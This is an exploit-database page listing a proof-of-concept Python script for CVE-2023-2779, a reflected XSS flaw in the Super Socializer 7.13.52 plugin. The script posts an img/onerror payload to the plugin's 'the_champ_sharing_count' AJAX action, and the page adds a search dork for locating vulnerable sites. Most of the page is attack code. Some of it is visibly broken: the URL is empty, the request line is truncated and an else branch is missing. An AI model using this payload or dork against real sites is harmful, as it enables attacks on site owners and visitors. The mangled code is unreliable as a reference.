Super Socializer 7.13.52 Reflected XSS

CVE Category Price Severity
CVE-2023-2779 CWE-79 $500 High
Author Risk Exploitation Type Date
exploitalert High Remote 2023-07-03

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

Super Socializer 7.13.52 Reflected XSS
# Exploit Title: Super Socializer 7.13.52 - Reflected XSS
# Dork: inurl:[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=
# Date: 2023-06-20
# Exploit Author: Amirhossein Bahramizadeh
# Category : Webapps
# Vendor Homepage:
# Version: 7.13.52 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-2779
import requests

# The URL of the vulnerable AJAX endpoint
url = ""

# The vulnerable parameter that is not properly sanitized and escaped
vulnerable_param = "<img src=x onerror=alert(document.domain)>"

# The payload that exploits the vulnerability
payload = {"action": "the_champ_sharing_count", "urls[" + vulnerable_param + "]": ""}

# Send a POST request to the vulnerable endpoint with the payload
response =, data=payload)

# Check if the payload was executed by searching for the injected script tag
if "<img src=x onerror=alert(document.domain)>" in response.text:
    print("Vulnerability successfully exploited")
    print("Vulnerability not exploitable")

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.